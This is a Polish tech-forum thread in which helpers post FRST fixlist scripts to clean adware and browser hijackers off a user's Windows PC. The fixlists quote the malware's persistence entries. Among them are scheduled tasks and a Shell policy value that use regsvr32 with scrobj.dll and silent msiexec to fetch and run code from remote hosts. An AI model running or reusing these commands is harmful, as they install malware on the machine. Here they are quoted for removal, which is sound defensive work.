Elektroda.pl
Elektroda.pl
X
CControls
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Niechciane wirusy na komputerze, toolbary oraz pop-upy

aureg 28 Kwi 2017 17:53 321 3
  • CControls
  • #2 28 Kwi 2017 20:19
    Acorus 20
    Spec od komputerów

    Odinstaluj ASUS WebStorage Sync Agent.Otwórz notatnik systemowy i wklej:

    Task: {05201B2E-A49A-49DD-9598-DA0DB1A20649} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj8cOTqxFUE5RTw3MkU5MkY2MURXOYE3MjzSNThSRTIyRF== scrobj.dll
    Task: {2855AB14-B9E8-4573-93D6-51C5E348F916} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q
    Task: {43794CFB-9F9B-42DC-93F4-389D753E9887} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1
    Task: {7AED2CB5-8084-4FF1-9B73-1E4FBC3D16B4} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj8cOTqxFUE5RTw3MkU5MkY2MURXOYE3MjzSNThSRTIyRF== scrobj.dll
    Task: {94F9E3DD-50AD-44C1-818E-FD51C6943FF6} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () <==== UWAGA
    ShortcutWithArgument: C:\Users\sabina\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=...d=WDCXWD5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8
    ShortcutWithArgument: C:\Users\sabina\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=...d=WDCXWD5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8
    HKU\S-1-5-21-3528565663-812206232-166054652-1001\...\Run: [AdobeBridge] => [X]
    HKU\S-1-5-21-3528565663-812206232-166054652-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8cOTqxFUE5RTw3MkU5MkY2MURXOYE3MjzSNThSRTIyRF== /q
    HKU\S-1-5-21-3528565663-812206232-166054652-1001\...\MountPoints2: {cbbef2bb-7939-11e4-824f-806e6f6e6963} - "F:\start.exe"
    HKU\S-1-5-18\...\RunOnce: [Adobe Speed Launcher] => 1430569694
    IFEO\DisplaySwitch.exe: [Debugger]
    IFEO\taskmgr.exe: [Debugger]
    GroupPolicy: Ograniczenia - Chrome <======= UWAGA
    CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <======= UWAGA
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...d=WDCXWD5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8




    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...d=WDCXWD5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&...D5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8&q={searchTerms}
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&...D5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8&q={searchTerms}
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...d=WDCXWD5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...d=WDCXWD5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&...D5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8&q={searchTerms}
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&...D5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8&q={searchTerms}
    HKU\S-1-5-21-3528565663-812206232-166054652-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...d=WDCXWD5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8
    HKU\S-1-5-21-3528565663-812206232-166054652-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...d=WDCXWD5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8
    SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...D5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8&q={searchTerms}
    SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...D5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8&q={searchTerms}
    SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...D5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8&q={searchTerms}
    SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...D5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3528565663-812206232-166054652-1001 -> DefaultScope {95B7759C-8C7F-4BF1-B163-73684A933233} URL = hxxps://mysearch.avg.com/search?cid={23FA10D9-86B4-4320-919B-52C9ADB1A178}&mid=cf490ca57a0947d29d3b915f38f4dcf5-b52e40e6242da215442f22676987b7b79c949add&lang=en&ds=ft013&coid=avgtbdisft&cmpid=0415tb&pr=sa&d=2014-09-24 08:55:36&v=19.6.0.592&pid=safeguard&sg=&sap=dsp&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3528565663-812206232-166054652-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-21-3528565663-812206232-166054652-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...D5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3528565663-812206232-166054652-1001 -> {95B7759C-8C7F-4BF1-B163-73684A933233} URL = hxxps://mysearch.avg.com/search?cid={23FA10D9-86B4-4320-919B-52C9ADB1A178}&mid=cf490ca57a0947d29d3b915f38f4dcf5-b52e40e6242da215442f22676987b7b79c949add&lang=en&ds=ft013&coid=avgtbdisft&cmpid=0415tb&pr=sa&d=2014-09-24 08:55:36&v=19.6.0.592&pid=safeguard&sg=&sap=dsp&q={searchTerms}
    Toolbar: HKLM - AVG SafeGuard toolbar - {95B7759C-8C7F-4BF1-B163-73684A933233} - C:\Program Files\AVG SafeGuard toolbar\19.6.0.592\AVG SafeGuard toolbar_toolbar.dll [2016-08-24] (AVG Secure Search)
    Toolbar: HKLM-x32 - AVG SafeGuard toolbar - {95B7759C-8C7F-4BF1-B163-73684A933233} - C:\Program Files (x86)\AVG SafeGuard toolbar\19.6.0.592\AVG SafeGuard toolbar_toolbar.dll [2016-08-24] (AVG Secure Search)
    FF SearchPlugin: C:\Users\sabina\AppData\Roaming\Firefox\Firefox\Profiles\7nimpe38.default\searchplugins\startsearch.xml [2017-04-19]
    CHR HomePage: Default -> hxxp://www.ourluckysites.com/?type=hp&ts=...d=WDCXWD5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8
    CHR StartupUrls: Default -> "hxxp://www.ourluckysites.com/?type=hp&ts=1492581494&z=658db6884c176c16e5f02a7gbzctbo6w8b7gezfbbz&from=che0812&uid=WDCXWD5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8"
    CHR DefaultSearchURL: Default -> hxxp://www.ourluckysites.com/search/?type=ds&...D5000LPVX-80V0TT0_WD-WXL1EB3NTVH8NTVH8&q={searchTerms}
    CHR DefaultSearchKeyword: Default -> ourluckysites
    HKU\S-1-5-21-3528565663-812206232-166054652-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe <==== UWAGA
    R2 SNARE; C:\Users\sabina\AppData\Local\SNARE\Snare.dll [833536 2017-04-27] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego]
    S4 3DM; C:\Users\sabina\AppData\Local\3DM\Kitty.dll [X]
    S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X]
    S2 FirefoxU; "C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe" [X] <==== UWAGA
    S2 WinSAPSvc; C:\Users\sabina\AppData\Roaming\WinSAPSvc\WinSAP.dll [X] <==== UWAGA
    R1 {2859046f-5dca-482a-8c2d-37943d33a392}w64; C:\WINDOWS\System32\drivers\{2859046f-5dca-482a-8c2d-37943d33a392}w64.sys [48792 2014-11-04] (StdLib)
    R1 {29302da5-1178-40ac-a178-4cb57ebcc501}w64; C:\WINDOWS\System32\drivers\{29302da5-1178-40ac-a178-4cb57ebcc501}w64.sys [48792 2014-10-25] (StdLib)
    R1 {5f0f49f4-526a-4e0c-b198-a0742c879601}w64; C:\WINDOWS\System32\drivers\{5f0f49f4-526a-4e0c-b198-a0742c879601}w64.sys [48784 2014-11-29] (StdLib)
    R1 {6db7eb66-a30b-41a3-809c-addb2341dafb}w64; C:\WINDOWS\System32\drivers\{6db7eb66-a30b-41a3-809c-addb2341dafb}w64.sys [48792 2014-11-01] (StdLib)
    R1 {7012eec1-4f37-42d4-a2cd-26727494d248}Gw64; C:\WINDOWS\System32\drivers\{7012eec1-4f37-42d4-a2cd-26727494d248}Gw64.sys [48792 2014-10-14] (StdLib)
    R1 {7012eec1-4f37-42d4-a2cd-26727494d248}w64; C:\WINDOWS\System32\drivers\{7012eec1-4f37-42d4-a2cd-26727494d248}w64.sys [48792 2014-10-15] (StdLib)
    R1 {794fff75-3f4f-4508-a917-eee2946e84aa}w64; C:\WINDOWS\System32\drivers\{794fff75-3f4f-4508-a917-eee2946e84aa}w64.sys [48784 2014-11-26] (StdLib)
    R1 {88155b61-d5d0-401c-9c66-16b32c330fd8}w64; C:\WINDOWS\System32\drivers\{88155b61-d5d0-401c-9c66-16b32c330fd8}w64.sys [48784 2014-11-29] (StdLib)
    R1 {8c39d0b0-9b68-43ef-bc3c-2ef385fe5169}w64; C:\WINDOWS\System32\drivers\{8c39d0b0-9b68-43ef-bc3c-2ef385fe5169}w64.sys [48792 2014-11-06] (StdLib)
    R1 {9de7e012-74d3-4f9d-b4b0-2d3150073168}w64; C:\WINDOWS\System32\drivers\{9de7e012-74d3-4f9d-b4b0-2d3150073168}w64.sys [48792 2014-11-10] (StdLib)
    R1 {a6762132-8e80-4305-b1ba-2bec91757ac2}w64; C:\WINDOWS\System32\drivers\{a6762132-8e80-4305-b1ba-2bec91757ac2}w64.sys [48792 2014-10-22] (StdLib)
    R1 {b30c55f2-a940-4907-8051-f13c9acdacdd}w64; C:\WINDOWS\System32\drivers\{b30c55f2-a940-4907-8051-f13c9acdacdd}w64.sys [48784 2014-11-27] (StdLib)
    R1 {cd63c300-b231-4a93-a479-5a1e96976d74}Gw64; C:\WINDOWS\System32\drivers\{cd63c300-b231-4a93-a479-5a1e96976d74}Gw64.sys [48760 2016-01-08] (StdLib)
    R1 {cd63c300-b231-4a93-a479-5a1e96976d74}w64; C:\WINDOWS\System32\drivers\{cd63c300-b231-4a93-a479-5a1e96976d74}w64.sys [48784 2014-11-30] (StdLib)
    R1 {dda91daf-e6f8-4453-88d1-df18d861c904}w64; C:\WINDOWS\System32\drivers\{dda91daf-e6f8-4453-88d1-df18d861c904}w64.sys [48792 2014-10-28] (StdLib)
    S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] <==== UWAGA
    2017-04-24 09:17 - 2017-04-28 16:44 - 00003472 _____ C:\WINDOWS\System32\Tasks\T0528
    2017-04-19 12:21 - 2016-05-23 04:41 - 00055056 _____ (Elex do Brasil Participações Ltda) C:\WINDOWS\system32\Drivers\iSafeKrnlBoot.sys
    2017-04-19 12:21 - 2016-05-19 08:42 - 00052392 _____ (Elex do Brasil Participações Ltda) C:\WINDOWS\system32\Drivers\iSafeNetFilter.sys
    2017-04-17 17:17 - 2017-04-17 17:17 - 00000007 _____ C:\WINDOWS\SysWOW64\CAC7.tmp
    2017-04-17 17:17 - 2017-04-17 17:17 - 00000000 ____D C:\Users\sabina\AppData\Local\Eastness
    2017-04-17 17:17 - 2017-04-17 17:17 - 00000000 ____D C:\Program Files (x86)\Eastness
    2017-04-17 17:16 - 2017-04-28 17:21 - 00000000 ____D C:\Users\sabina\AppData\Roaming\WinSAPSvc
    2017-04-17 17:16 - 2017-04-28 16:46 - 00000023 _____ C:\Users\Public\Documents\temp.dat
    2017-04-17 17:16 - 2017-04-28 16:43 - 00003604 _____ C:\WINDOWS\System32\Tasks\Milimili
    2017-04-17 17:16 - 2017-04-27 13:44 - 00000000 ____D C:\Users\sabina\AppData\Local\SNARE
    2017-04-17 17:16 - 2017-04-17 17:17 - 00000000 ____D C:\Program Files (x86)\MIO
    2017-04-13 18:49 - 2017-04-28 16:44 - 00003580 _____ C:\WINDOWS\System32\Tasks\Windows-WoShiBeiYongDe
    2017-04-10 19:01 - 2017-04-28 16:44 - 00003570 _____ C:\WINDOWS\System32\Tasks\PowerWord-SCT-JT
    2017-04-28 16:44 - 2015-10-15 18:32 - 00003264 _____ C:\WINDOWS\System32\Tasks\{E6EF4CE2-CB63-4B4A-8956-F4B662836D78}
    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze.
    Uruchom jako administrator FRST i kliknij w Fix/Napraw.
    Pobierz i uruchom jako administrator AdwCleaner https://toolslib.net/downloads/finish/1/ Kliknij Scan(Skanuj) i później Cleaning(Oczyść).
    Pokaż nowy raport z FRST bez Addition i Shortcut.

    0
  • CControls
  • #4 28 Kwi 2017 21:14
    Kolobos
    Spec od komputerów

    Nowy Fixlist.txt dla FRST:
    2017-04-28 20:48 - 2017-04-28 20:59 - 00000000 ____D C:\AdwCleaner
    2017-04-27 13:48 - 2017-04-28 16:10 - 00000000 ____D C:\WINDOWS\psgo
    2017-04-20 20:13 - 2017-04-28 13:13 - 00000000 _____ C:\WINDOWS\SysWOW64\1
    2017-04-20 19:40 - 2017-04-25 14:38 - 00000000 _____ C:\WINDOWS\SysWOW64\22
    2017-04-20 19:30 - 2017-04-25 14:25 - 00000000 _____ C:\WINDOWS\SysWOW64\11
    2017-04-19 12:21 - 2017-04-28 20:59 - 00000000 ____D C:\WINDOWS\system32\log
    2017-04-19 07:58 - 2017-04-28 17:10 - 00000000 ____D C:\Users\sabina\AppData\Local\3DM

    Po wykonaniu usun katalog C:\FRST i to wszystko.

    0